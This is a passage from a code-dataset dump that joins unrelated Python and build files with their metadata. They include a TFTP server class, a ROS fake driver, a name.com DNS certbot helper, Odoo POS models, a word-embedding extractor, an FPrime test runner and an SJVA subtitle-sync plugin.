configuration.\n\n :ivar backend: The :class:`TFTPBackend` being used to service TFTP\n requests.\n\n :ivar port: The port on which each server is started.\n\n :ivar refresher: A :class:`TimerService` that calls\n ``updateServers`` periodically.\n\n \"\"\"\n\n def __init__(self, resource_root, port, client_service):\n \"\"\"\n :param resource_root: The root directory for this TFTP server.\n :param port: The port on which each server should be started.\n :param client_service: The RPC client service for the rack controller.\n \"\"\"\n super(TFTPService, self).__init__()\n self.backend = TFTPBackend(resource_root, client_service)\n self.port = port\n # Establish a periodic call to self.updateServers() every 45\n # seconds, so that this service eventually converges on truth.\n # TimerService ensures that a call is made to it's target\n # function immediately as it's started, so there's no need to\n # call updateServers() from here.\n self.refresher = internet.TimerService(45, self.updateServers)\n self.refresher.setName(\"refresher\")\n self.refresher.setServiceParent(self)\n\n def getServers(self):\n \"\"\"Return a set of all configured servers.\n\n :rtype: :class:`set` of :class:`internet.UDPServer`\n \"\"\"\n return {\n service for service in self\n if service is not self.refresher\n }\n\n def updateServers(self):\n \"\"\"Run a server on every interface.\n\n For each configured network interface this will start a TFTP\n server. If called later it will bring up servers on newly\n configured interfaces and bring down servers on deconfigured\n interfaces.\n \"\"\"\n addrs_established = set(service.name for service in self.getServers())\n addrs_desired = set(get_all_interface_addresses())\n\n for address in addrs_desired - addrs_established:\n if not IPAddress(address).is_link_local():\n tftp_service = UDPServer(\n self.port, TFTP(self.backend), interface=address)\n tftp_service.setName(address)\n tftp_service.setServiceParent(self)\n\n for address in addrs_established - addrs_desired:\n tftp_service = self.getServiceNamed(address)\n tftp_service.disownServiceParent()\n","sub_path":"provisioningserver/rackdservices/tftp.py","file_name":"tftp.py","file_ext":"py","file_size_in_byte":18058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441469166","text":"#!/usr/bin/python\n#################################################################\n##\\file\n#\n# \\note\n# Copyright (c) Felix Messmer \\n\n# Fraunhofer Institute for Manufacturing Engineering\n# and Automation (IPA) \\n\n#\n# All rights reserved. \\n\\n\n#\n#################################################################\n#\n# \\note\n# Repository name: cob_command_tools\n# \\note\n# ROS package name: cob_helper_tools\n#\n# \\author\n# Author: Felix Messmer\n#\n# \\date Date of creation: January 2017\n#\n# \\brief\n# A script providing services to fake a (ros_canopen) driver\n#\n#################################################################\n\nimport rospy\nfrom std_srvs.srv import *\nfrom diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus\n\nclass FakeDriver():\n\n def __init__(self):\n self.init_srv = rospy.Service('driver/init', Trigger, self.srv_cb)\n self.recover_srv = rospy.Service('driver/recover', Trigger, self.srv_cb)\n self.halt_srv = rospy.Service('driver/halt', Trigger, self.srv_cb)\n self.shutdown_srv = rospy.Service('driver/shutdown', Trigger, self.srv_cb)\n\n self._fake_diag_pub = rospy.Publisher('/diagnostics', DiagnosticArray, queue_size=1)\n rospy.Timer(rospy.Duration(1.0), self.publish_diagnostics)\n\n def publish_diagnostics(self, event):\n msg = DiagnosticArray()\n msg.header.stamp = rospy.get_rostime()\n\n status = DiagnosticStatus()\n status.name = rospy.get_name()\n status.level = DiagnosticStatus.OK\n status.message = \"fake diagnostics\"\n status.hardware_id = rospy.get_name()\n msg.status.append(status)\n\n self._fake_diag_pub.publish(msg)\n\n def srv_cb(self, req):\n resp = TriggerResponse()\n resp.success = True\n return resp\n\n\nif __name__ == \"__main__\":\n rospy.init_node('fake_driver')\n FakeDriver()\n rospy.loginfo(\"fake_driver running\")\n rospy.spin()\n\n","sub_path":"cob_helper_tools/scripts/fake_driver.py","file_name":"fake_driver.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"402635424","text":"# =============================================================================\n# OWSLib. Copyright (C) 2005 Sean C. Gillies\n#\n# Contact email: sgillies@frii.com\n# =============================================================================\n\ndef patch_well_known_namespaces(etree_module):\n \"\"\"Monkey patches the etree module to add some well-known namespaces.\"\"\"\n etree_module._namespace_map.update({\n \"http://www.w3.org/1999/02/22-rdf-syntax-ns#\": \"rdf\", \n \"http://purl.org/rss/1.0/\": \"rss\", \n \"http://purl.org/rss/1.0/modules/taxonomy/\": \"taxo\", \n \"http://purl.org/dc/elements/1.1/\": \"dc\", \n \"http://purl.org/rss/1.0/modules/syndication/\": \"syn\", \n \"http://www.w3.org/2003/01/geo/wgs84_pos#\": \"geo\",\n \"http://www.opengis.net/cat/csw/2.0.2\": \"csw\",\n \"http://purl.org/dc/terms/\": \"dct\",\n \"http://www.isotc211.org/2005/gco\": \"gco\",\n \"http://www.isotc211.org/2005/gmd\": \"gmd\",\n \"http://www.isotc211.org/2005/gts\": \"gts\",\n \"http://www.isotc211.org/2005/srv\": \"srv\",\n \"http://www.fgdc.gov\": \"fgdc\",\n \"http://gcmd.gsfc.nasa.gov/Aboutus/xml/dif/\": \"dif\",\n \"http://www.opengis.net/gml\": \"gml\",\n \"http://www.opengis.net/ogc\": \"ogc\",\n \"http://www.opengis.net/ows\": \"ows\",\n \"http://www.opengis.net/ows/1.1\": \"ows\",\n \"http://www.opengis.net/ows/2.0\": \"ows\",\n \"http://www.opengis.net/wms\": \"wms\",\n \"http://www.opengis.net/context\": \"wmc\",\n \"http://www.opengis.net/wfs\": \"wfs\",\n \"http://www.opengis.net/sos/1.0\": \"sos\",\n \"urn:oasis:names:tc:ebxml-regrep:xsd:rim:3.0\": \"rim\",\n \"http://www.w3.org/2001/XMLSchema\": \"xs\",\n \"http://www.w3.org/XML/Schema\": \"xs2\",\n \"http://www.w3.org/2001/XMLSchema-instance\": \"xsi\",\n \"http://www.w3.org/1999/xlink\": \"xlink\"})\n\n# try to find elementtree or lxml\ntry:\n from lxml import etree\nexcept ImportError:\n try:\n # Python < 2.5 with ElementTree installed\n import elementtree.ElementTree as etree\n patch_well_known_namespaces(etree)\n except ImportError:\n try:\n # Python 2.5 with ElementTree included\n import xml.etree.ElementTree as etree\n patch_well_known_namespaces(etree)\n except ImportError:\n raise RuntimeError('You need either ElementTree or lxml to use OWSLib!')\n\n","sub_path":"owslib/etree.py","file_name":"etree.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"565989546","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, models, fields, registry\nimport json\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nclass pos_bus(models.Model):\n _name = \"pos.bus\"\n _description = \"Branch/Store of shops\"\n\n name = fields.Char('Location Name', required=1)\n user_id = fields.Many2one('res.users', string='Sale admin')\n log_ids = fields.One2many('pos.bus.log', 'bus_id', string='Logs')\n\n @api.model\n def sync_orders(self, config_id, datas):\n config = self.env['pos.config'].sudo().browse(config_id)\n sessions = self.env['pos.session'].sudo().search([\n ('state', '=', 'opened')\n ])\n for session in sessions:\n if session.config_id.user_id and session.config_id.user_id != self.env.user and session.config_id and session.config_id.bus_id and session.config_id.bus_id.id == config.bus_id.id:\n for data in datas:\n value = {\n 'data': data,\n 'action': 'new_order',\n 'bus_id': config.bus_id.id,\n 'order_uid': data['uid']\n }\n _logger.info('Sync order to %s' % session.config_id.user_id.login)\n self.env['bus.bus'].sendmany(\n [[(self.env.cr.dbname, 'pos.bus', session.config_id.user_id.id), json.dumps({\n 'user_send_id': self.env.user.id,\n 'value': value\n })]])\n\n\nclass pos_bus_log(models.Model):\n _name = \"pos.bus.log\"\n _description = \"Transactions of Branch/Store\"\n\n user_id = fields.Many2one('res.users', 'User', required=1, ondelete='cascade')\n bus_id = fields.Many2one('pos.bus', 'Branch/Store', required=1, ondelete='cascade')\n action = fields.Selection([\n ('selected_order', 'Change order'),\n ('new_order', 'Add order'),\n ('unlink_order', 'Remove order'),\n ('line_removing', 'Remove line'),\n ('set_client', 'Set customer'),\n ('trigger_update_line', 'Update line'),\n ('change_pricelist', 'Add pricelist'),\n ('sync_sequence_number', 'Sync sequence order'),\n ('lock_order', 'Lock order'),\n ('unlock_order', 'Unlock order'),\n ('set_line_note', 'Set note'),\n ('set_state', 'Set state'),\n ('order_transfer_new_table', 'Transfer to new table'),\n ('set_customer_count', 'Set guest'),\n ('request_printer', 'Request printer'),\n ('set_note', 'Set note'),\n ('paid_order', 'Paid order')\n ], string='Action', required=1)\n\n\n\n","sub_path":"models/pos/pos_bus.py","file_name":"pos_bus.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"342658110","text":"import os, sys, commands\n\nImport('env')\nImport('platform_libs')\nImport('boost_path')\n\nall_libs = []\nall_libs += [platform_libs]\nall_libs += [File(os.path.join(boost_path, 'libboost_log_setup.a'))]\nall_libs += [File(os.path.join(boost_path, 'libboost_log.a'))]\nall_libs += [File(os.path.join(boost_path, 'libboost_thread.a'))]\nall_libs += [File(os.path.join(boost_path, 'libboost_system.a'))]\nall_libs += [File(os.path.join(boost_path, 'libboost_filesystem.a'))]\n\nsources = []\nsources += Glob('*.cc')\nsources += ['../common/chef_log.o']\nsources += ['../common/statistics.o']\n\nprgs = []\nprgs += env.Program('server2', sources, LIBS = all_libs)\nReturn('prgs')\n","sub_path":"src/server2/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"584307023","text":"import sys\nimport json\nimport requests\n\n\nclass NameComDNS:\n def __init__(self, domain_name):\n self.username = 'username at name.com'\n self.token = 'token'\n self.domain_name = domain_name\n\n def list_records(self):\n url = 'https://api.name.com/v4/domains/%s/records' % self.domain_name\n r = requests.get(url, auth=(self.username, self.token))\n\n return r.json()\n\n def create_record(self, data):\n url = 'https://api.name.com/v4/domains/%s/records' % self.domain_name\n r = requests.post(url, data=json.dumps(data), auth=(self.username, self.token))\n if r.status_code == 200 or r.status_code == 201:\n print(r.json())\n else:\n print('%s: %s' % (r.status_code, r.content))\n\n def del_record(self, record_id):\n url = 'https://api.name.com/v4/domains/%s/records/%s' % (self.domain_name, record_id)\n r = requests.delete(url, data=data, auth=(self.username, self.token))\n\n print(r.json())\n\n\nif __name__ == '__main__':\n\n file_name, cmd, certbot_domain, certbot_validation = sys.argv\n\n data = {\n 'domainName': 'lonelyassistant.net',\n 'host': '_acme-challenge',\n 'fqdn': '_acme-challenge.lonelyassistant.net',\n 'type': 'TXT',\n 'answer': certbot_validation,\n 'ttl': 300,\n }\n\n ncd = NameComDNS(certbot_domain)\n\n if cmd == 'add':\n ncd.create_record(data)\n\n elif cmd == 'clean':\n j = ncd.list_records()\n\n for record in j['records']:\n if record['host'] == '_acme-challenge':\n ncd.del_record(record['id'])\n\n\n\n","sub_path":"name_com_dns.py","file_name":"name_com_dns.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"198561017","text":"#!/usr/bin/python\n\nimport json\nimport redis\n\nr = redis.Redis(unix_socket_path='/tmp/redis.sock')\n\n\nc = r.scan_iter('user::*')\nfor k in c:\n user = json.loads(r.get(k), encoding='utf-8')\n if 'location' in user and user['location']:\n (lng, lat) = user['location']['geo']['coordinates']\n r.execute_command('geoadd', 'users:geo:::', lng, lat, k)\n print('Indexed user %s' % (user['profile']['name']))\n\nr.delete(\"users:geo::\")\n","sub_path":"utils/reindex_geo.py","file_name":"reindex_geo.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"609972748","text":"from gensim.models import KeyedVectors as Word2Vec\nimport extractors.tokenizer as tokenizer\n#import tokenizer\nimport numpy as np\nimport os\n\n\nbasepath = \"/home/bt1/13CS10037/btp_final_from_server\"\ndatapath = basepath+\"/ayush_dataset\"\n\ndef get_stopwords(filename):\n words = open(filename, \"r\")\n return [ word.strip() for word in words.readlines()]\n\nmodel = None\nstopwords = get_stopwords(os.path.join(datapath, \"stopwords.txt\"))\n\nNDIM = 300\ndef features(text):\n\tglobal model\n\tif(model is None):\n\t\tmodel = Word2Vec.load_word2vec_format('embeddings/google_news_300.bin', binary=True)\n\t\tprint(\"Word vector model Loaded\")\n\tparsed = tokenizer.parse(text.strip())\n\tembeds = []\n\tfor sentence in parsed:\n\t\ttoks = sentence['tokens']\n\t\tfor tokeninfo in toks:\n\t\t\tif tokeninfo['word'].lower() in stopwords:\n\t\t\t\tcontinue\n\t\t\ttry:\n\t\t\t\tword = tokeninfo['word'].lower()\n\t\t\t\tembeds.append(model[word].tolist())\n\t\t\texcept:\n\t\t\t\ttry:\n\t\t\t\t\tembeds.append(model[tokeninfo['lemma'].lower()].tolist())\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\tembeds = np.asarray(embeds)\n\tif(len(embeds) > 0):\n\t\treturn np.mean(embeds, axis=0)\n\telse:\n\t\treturn np.zeros(NDIM)\n\ndef feature_names():\n\treturn [\"embed_\"+str(i) for i in range(NDIM)]\n\n\ndef feature_name_type():\n\treturn [(\"embed_\"+str(i), \"REAL\") for i in range(NDIM)]\n\n\ndef sentence_sim(sent1, sent2):\n\tglobal model\n\tif(model is None):\n\t\tmodel = Word2Vec.load_word2vec_format('embeddings/google_news_300.bin', binary=True)\n\tparsed = tokenizer.parse(sent1.strip())\n\tsent1_ = [tokeninfo['word'] for sentence in parsed \n\t\tfor tokeninfo in sentence['tokens'] if tokeninfo['word'] not in stopwords]\n\tparsed = tokenizer.parse(sent2.strip())\n\tsent2_ = [tokeninfo['word'] for sentence in parsed \n\t\tfor tokeninfo in sentence['tokens'] if tokeninfo['word'] not in stopwords]\n\n\treturn model.wmdistance(sent1_, sent2_)\n\n\n\n#print(features(\"Word is a game\"))\n\n\n","sub_path":"extractors/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"539130116","text":"def replace(s: str)-> str:\n \"\"\"\n 对s中的空格进行替换,要求是inplace,返回s\n \"\"\"\n s = list(s)\n num_space = 0\n for ch in s:\n if ch == \" \":\n num_space += 1\n old_len = len(s) - 1\n new_len = old_len + 2 * num_space\n s = s + 2 * num_space * [\" \"]\n while old_len >= 0:\n if s[old_len] == \" \":\n s[new_len-2:new_len+1] = [\"%\", \"2\", \"0\"]\n new_len -= 3\n else:\n s[new_len] = s[old_len]\n new_len -= 1\n old_len -= 1\n return \"\".join(s)\n\n\ndef test():\n s = \"We are happy.\"\n s1 = \" this is . \"\n print(replace(s))\n print(replace(s1))\n\nif __name__ == \"__main__\":\n test()\n\n","sub_path":"04-字符串替换/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222803942","text":"'''\nFPrimeTestRunner\n\nA runner used to set the colorization of the results, and interactivity when regarding\nsuites and tests. This overrides the standard unittest test runner.\n\n@author: mstarch\n'''\nimport re\nimport collections\nimport unittest\n\ntry:\n import colour_runner.result\n TestClass = colour_runner.result.ColourTextTestResult\nexcept ImportError:\n TestClass = unittest.runner.TextTestResult\n\nclass FPrimeTestRunner(unittest.runner.TextTestRunner):\n '''\n An FPrime variant of the standard text runner used to set the test\n runner's result class to use the colorized variant if it exists\n '''\n resultclass = TestClass\n NO = 0\n YES = 1\n ALL = 2\n YES_NO_RE = re.compile(\"^((?:yes)|(?:no)|(?:y)|(?:n))$\", re.IGNORECASE)\n YES_NO_ALL_RE = re.compile(\"^((?:yes)|(?:no)|(?:y)|(?:n)|(?:all)|(?:a))$\", re.IGNORECASE)\n\n def __init__(self, *args, **kwargs):\n '''\n Setup this test, passing in input to super\n @param args: arguments (positional) to forward\n @param kwargs: key word arguments (interactive) will be stripped before\n pass through to super\n '''\n self.interactive = False\n #Interactive KWArgs striping\n if \"interactive\" in kwargs:\n self.interactive = kwargs[\"interactive\"]\n del kwargs[\"interactive\"]\n self.testbed = {\"name\": \"default\"}\n #testbed KWArgs striping\n if \"testbed\" in kwargs:\n self.testbed = kwargs[\"testbed\"]\n del kwargs[\"testbed\"]\n #no_color\n if \"no_color\" in kwargs:\n self.no_color = kwargs[\"no_color\"]\n del kwargs[\"no_color\"]\n if self.no_color:\n FPrimeTestRunner.resultclass = unittest.runner.TextTestResult\n unittest.runner.TextTestRunner.__init__(self, *args, **kwargs)\n\n def run(self, test):\n '''\n Run the test\n '''\n spec = self.recurse_for_tests(test)\n for name, tests in spec.iteritems():\n suite_resp = self.get_interactive_response(name)\n #Loop through the suite asking for each if required\n for indv, func in tests:\n #Check global responses\n if suite_resp == self.ALL:\n continue\n elif suite_resp == self.NO:\n self.skip(func)\n continue\n #Get individual response\n resp = self.get_interactive_response(indv, self.YES_NO_RE)\n if resp == self.NO:\n self.skip(func)\n return unittest.runner.TextTestRunner.run(self, test)\n\n def skip(self, func):\n '''\n Skip a given test\n @param func: function to skip\n '''\n #Python 2/3\n try:\n setattr(func, \"__unittest_skip__\", True)\n setattr(func, \"__unittest_skip_why__\", \"User interactively skipped test\")\n except AttributeError:\n setattr(func.__func__, \"__unittest_skip__\", True)\n setattr(func.__func__, \"__unittest_skip_why__\", \"User interactively skipped test\")\n\n def recurse_for_tests(self, test, rdict=None):\n '''\n Recurse through the TestSuite to look for individual tests, and then roll up the tests\n by module in order to get a list that we can interact with.\n @param test: test or testsuite\n '''\n #Prevent run-on-init default parameters\n if rdict is None:\n rdict = collections.OrderedDict()\n #If it is not a test suite, add test\n if not hasattr(test, \"_tests\"):\n module = test.__module__\n name = test._testMethodName\n test = getattr(test, name)\n tup = (name, test)\n #Setup dictionary entry if not there and add the tuple\n if not module in rdict:\n rdict[module] = []\n rdict[module].append(tup)\n #For test cases, recurse\n else:\n for tmp in getattr(test, \"_tests\"):\n self.recurse_for_tests(tmp, rdict)\n return rdict\n\n def get_interactive_response(self, test, reg=YES_NO_ALL_RE):\n '''\n Gets an interactive response from a user. It must match one of the following:\n - y or yes: run this test (don't skip)\n - n or no: do not run this script (skip)\n - a or all: run all the tests in this test case\n @param test: test/test suite name\n @return: YES, NO, ALL\n '''\n #Short circuit a response if non-interactive and skipped tests\n if not self.interactive:\n return self.ALL\n #Attempted, not always working\n elif getattr(test, \"__unittest_skip__\", False):\n return self.YES\n #Check for test suit\n prompt = \"(yes, no, all)\" if reg is self.YES_NO_ALL_RE else \"(yes, no)\"\n #Match a response\n text = \"\"\n while not reg.match(text):\n text = raw_input(\"Run {0} {1}:\".format(test, prompt))\n text = reg.match(text).group(1).lower()\n return self.YES if text.startswith(\"y\") else (self.ALL if text.startswith(\"a\") else self.NO)\n","sub_path":"Gse/src/fprime/gse/testing/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"497388359","text":"# -*- coding: utf-8 -*-\r\n#########################################################\r\n# python\r\nimport os\r\nfrom datetime import datetime\r\nimport traceback\r\nimport logging\r\nimport subprocess\r\nimport time\r\nimport re\r\nimport threading\r\nimport json\r\nimport platform\r\nimport requests\r\n\r\n# third-party\r\nfrom flask import Blueprint, request, Response, send_file, render_template, redirect, jsonify\r\n\r\n# sjva 공용\r\nfrom framework import app, db, scheduler, path_app_root, socketio\r\nfrom framework.job import Job\r\nfrom framework.util import Util, AlchemyEncoder\r\nfrom framework.common.share import RcloneTool\r\nfrom system.model import ModelSetting as SystemModelSetting\r\n\r\n# 패키지\r\nfrom .plugin import logger, package_name, SERVER_URL\r\nfrom .logic import Logic\r\nfrom .model import ModelSetting, ModelClientAVSubItem\r\n\r\n#########################################################\r\n\r\n\r\n\r\nclass LogicAVSub(object):\r\n @staticmethod\r\n def process_ajax(sub, req):\r\n try:\r\n if sub == 'get_server_list':\r\n action = req.form['action']\r\n last_updated_time = ModelSetting.get('av_sub_last_updated_time')\r\n if action == 'all':\r\n last_updated_time = ''\r\n def func():\r\n ret = {'ret':False}\r\n page = 1\r\n count = 0\r\n while True:\r\n url = SERVER_URL + '/gd_share_server/noapi/av_sub/list?last_updated_time=%s&page=%s' % (last_updated_time, page)\r\n logger.debug(url)\r\n data = requests.get(url).json()\r\n for item in data['list']:\r\n #logger.debug(item)\r\n ModelClientAVSubItem.insert(item)\r\n count += 1\r\n #if data['paging']['next_page'] == 0 or data['paging']['current_page'] == data['paging']['last_page']:\r\n #logger.debug(data['paging'])\r\n if data['paging']['current_page'] >= data['paging']['total_page']:\r\n break\r\n page += 1\r\n ModelSetting.set('av_sub_last_updated_time', datetime.now().strftime('%Y-%m-%d %H:%M:%S') )\r\n ret['ret'] = True\r\n ret['data'] = count\r\n if action == 'all':\r\n data = {'type':'info', 'msg' : u'%s개를 업데이트 했습니다.' % count, 'url':''}\r\n socketio.emit(\"notify\", data, namespace='/framework', broadcast=True)\r\n return ret\r\n if action == 'all':\r\n thread = threading.Thread(target=func, args=())\r\n thread.setDaemon(True)\r\n thread.start()\r\n return jsonify(True)\r\n else:\r\n ret = func()\r\n return jsonify(ret)\r\n elif sub == 'get_server_count':\r\n url = SERVER_URL + '/gd_share_server/noapi/av_sub/count'\r\n data = requests.get(url).json()\r\n return jsonify(data) \r\n elif sub == 'web_list':\r\n ret = ModelClientAVSubItem.web_list(req)\r\n return jsonify(ret)\r\n elif sub == 'get_by_folder_name':\r\n ret = ModelClientAVSubItem.get_by_folder_name(req.form['folder_name']).as_dict()\r\n return jsonify(ret)\r\n elif sub == 'plex_search':\r\n ret = LogicAVSub.plex_search(req.form['keyword'])\r\n return jsonify(ret)\r\n elif sub == 'srt_copy':\r\n ret = LogicAVSub.srt_copy(req.form['folder_name'], req.form['srt_index'])\r\n return jsonify(ret)\r\n elif sub == 'plex_refresh':\r\n ret = LogicAVSub.plex_refresh(req.form['metakey'], req.form['folder_name'])\r\n return jsonify(ret) \r\n elif sub == 'do_action':\r\n logger.debug(req.form)\r\n mode = req.form['mode']\r\n server_type = req.form['server_type']\r\n folder_id = req.form['folder_id']\r\n folder_name = req.form['folder_name']\r\n server_filename = req.form['server_filename']\r\n remote_path = req.form['my_remote_path']\r\n action = req.form['action']\r\n mode = 'download' if mode == '0' else 'upload'\r\n server_type = 'category' if server_type == '0' else 'content'\r\n def func():\r\n RcloneTool.do_action(ModelSetting.get('rclone_path'), ModelSetting.get('rclone_config_path'), mode, server_type, folder_id, folder_name, server_filename, remote_path, action, folder_id_encrypted=True)\r\n if mode == 'upload' and server_type == 'content':\r\n tmp = remote_path.split('/')\r\n tmp2 = tmp[-1].split('.')\r\n if tmp2[-1].lower() in ['mp4', 'mkv', 'avi', 'wmv', 'srt']:\r\n url = SERVER_URL + '/gd_share_server/noapi/av_sub/refresh?folder_name=%s' % folder_name\r\n else:\r\n #url = SERVER_URL + '/gd_share_server/noapi/av_sub/refresh?folder_name=%s' % tmp[-1]\r\n pass\r\n data = requests.get(url).json()\r\n msg = u'모두 완료되었습니다.\\n'\r\n socketio.emit(\"command_modal_add_text\", str(msg), namespace='/framework', broadcast=True)\r\n thread = threading.Thread(target=func, args=())\r\n thread.setDaemon(True)\r\n thread.start()\r\n return jsonify('')\r\n elif sub == 'plex_search_all':\r\n #return Response(LogicAVSub.plex_search_all(), mimetype=\"text/event-stream\")\r\n LogicAVSub.plex_search_all()\r\n return jsonify('')\r\n elif sub == 'reset_db':\r\n db.session.query(ModelClientAVSubItem).delete()\r\n db.session.commit()\r\n ret = True\r\n return jsonify(ret) \r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n\r\n #################################################################\r\n\r\n @staticmethod\r\n def plex_search(keyword):\r\n try:\r\n logger.debug(keyword)\r\n from plex.logic_normal import LogicNormal\r\n data = LogicNormal.find_by_filename_part(keyword)\r\n\r\n item = ModelClientAVSubItem.get_by_folder_name(keyword)\r\n if len(data['list']) > 0:\r\n item.plex_metakey = ','.join(data['metadata_id'])\r\n item.remote_path = LogicAVSub.get_remote_path(data['list'][0]['dir'])\r\n data = LogicAVSub.set_remote_path(data)\r\n item.set_plex_json(data)\r\n logger.debug(data)\r\n return data\r\n \r\n except Exception as e: \r\n logger.error('Exception:%s', e) \r\n logger.error(traceback.format_exc())\r\n\r\n @staticmethod\r\n def plex_refresh(metakey, folder_name):\r\n try:\r\n from plex.logic_normal import LogicNormal\r\n data = LogicNormal.metadata_refresh(metadata_id=metakey.split('/')[-1])\r\n LogicAVSub.plex_search(folder_name)\r\n return True\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n return False\r\n\r\n\r\n @staticmethod\r\n def get_remote_path(filepath):\r\n try:\r\n rule = ModelSetting.get('av_sub_plex_match_rule')\r\n if rule is not None:\r\n tmp = rule.split('|')\r\n ret = filepath.replace(tmp[1], tmp[0])\r\n if filepath[0] != '/':\r\n ret = ret.replace('\\\\', '/')\r\n return ret.replace('//', '/').replace('\\\\\\\\', '\\\\')\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n \r\n @staticmethod\r\n def set_remote_path(data):\r\n try:\r\n rule = ModelSetting.get('av_sub_plex_match_rule')\r\n tmp = rule.split('|')\r\n if rule == '':\r\n return data\r\n for item in data['list']:\r\n ret = item['filepath'].replace(tmp[1], tmp[0])\r\n if item['filepath'][0] != '/':\r\n ret = ret.replace('\\\\', '/')\r\n ret = ret.replace('//', '/').replace('\\\\\\\\', '\\\\')\r\n item['remote_path'] = ret\r\n return data\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n \r\n\r\n @staticmethod\r\n def srt_copy(folder_name, source_index):\r\n try:\r\n item = ModelClientAVSubItem.get_by_folder_name(folder_name)\r\n logger.debug(item.plex_json)\r\n \r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n\r\n @staticmethod\r\n def plex_search_all():\r\n try:\r\n def func():\r\n data = ModelClientAVSubItem.get_plex_search_all()\r\n log = u\"%s개의 데이터를 분석을 시작합니다.\\n\" % len(data)\r\n socketio_callback('add', {'data':log})\r\n plex_log = log\r\n #data = data[:100]\r\n for index, tmp in enumerate(data):\r\n ret = LogicAVSub.plex_search(tmp.folder_name)\r\n log = u'%s / %s. %s => %s\\n' % (index+1, len(data), tmp.folder_name, tmp.plex_metakey)\r\n socketio_callback('add', {'data':log})\r\n plex_log += log\r\n thread = threading.Thread(target=func, args=())\r\n thread.setDaemon(True)\r\n thread.start()\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n\r\n\r\n @staticmethod\r\n def get_path_list(key):\r\n tmps = ModelSetting.get_list(key)\r\n ret = []\r\n for t in tmps:\r\n if t.endswith('*'):\r\n dirname = os.path.dirname(t)\r\n listdirs = os.listdir(dirname)\r\n for l in listdirs:\r\n ret.append(os.path.join(dirname, l))\r\n else:\r\n ret.append(t)\r\n return ret\r\n\r\n\r\n @staticmethod\r\n def get_download_remote_path(folder_name):\r\n tmps = LogicAVSub.get_path_list('av_sub_library_path')\r\n #logger.debug('folder_name: (%s)', folder_name)\r\n label = folder_name.split('-')[0].upper()\r\n path = os.path.join(ModelSetting.get('av_sub_no_library_path'), label)\r\n for t in tmps:\r\n tmp_path = os.path.join(t, label)\r\n if os.path.isdir(tmp_path):\r\n path = tmp_path\r\n break\r\n\r\n return LogicAVSub.get_remote_path(path)\r\n\r\n\r\n#########################################################\r\n# socketio / sub\r\n#########################################################\r\nsid_list = []\r\nplex_log = ''\r\n@socketio.on('connect', namespace='/%s/av_sub' % package_name)\r\ndef connect():\r\n try:\r\n logger.debug('socket_connect')\r\n sid_list.append(request.sid)\r\n socketio_callback('start', {'data':plex_log})\r\n #socketio_callback('connect',{})\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n\r\n\r\n@socketio.on('disconnect', namespace='/%s/av_sub' % package_name)\r\ndef disconnect():\r\n try:\r\n sid_list.remove(request.sid)\r\n logger.debug('socket_disconnect')\r\n except Exception as e: \r\n logger.error('Exception:%s', e)\r\n logger.error(traceback.format_exc())\r\n\r\ndef socketio_callback(cmd, data, encoding=True):\r\n if sid_list:\r\n if encoding:\r\n data = json.dumps(data, cls=AlchemyEncoder)\r\n data = json.loads(data)\r\n logger.debug(cmd)\r\n logger.debug(data)\r\n socketio.emit(cmd, data, namespace='/%s/av_sub' % package_name, broadcast=True)\r\n \r\n","sub_path":"logic_av_sub.py","file_name":"logic_av_sub.py","file_ext":"py","file_size_in_byte":12320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"568556650","text":"# Implement a function void reverse(char* str) in C or C++\n# which reverses a null-terminated string.\n\ndef rec_rev(tmp):\n if len(tmp) == 0:\n return ''\n return rec_rev(tmp[1:]) + tmp[0]\n\nassert rec_rev('abcde') == 'edcba'\nassert rec_rev('andds') == 'sddna'\n","sub_path":"algorithms_DS/COURSES/CtCI/ch01/1.2-reverse_string.py","file_name":"1.2-reverse_string.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"265942908","text":"from tkinter import *\nfrom tkinter import messagebox\nimport numpy as np\nimport numpy.random as rand\nimport random\n\n\ngame = Tk()\ngame.title('Paddi')\n\nagentImg = PhotoImage(file=\"agent.png\")\nKn = PhotoImage(file=\"normalKey.png\")\nKs = PhotoImage(file=\"specialKey.png\")\n\nAI = False\n\n#Board variables\nboard_config = 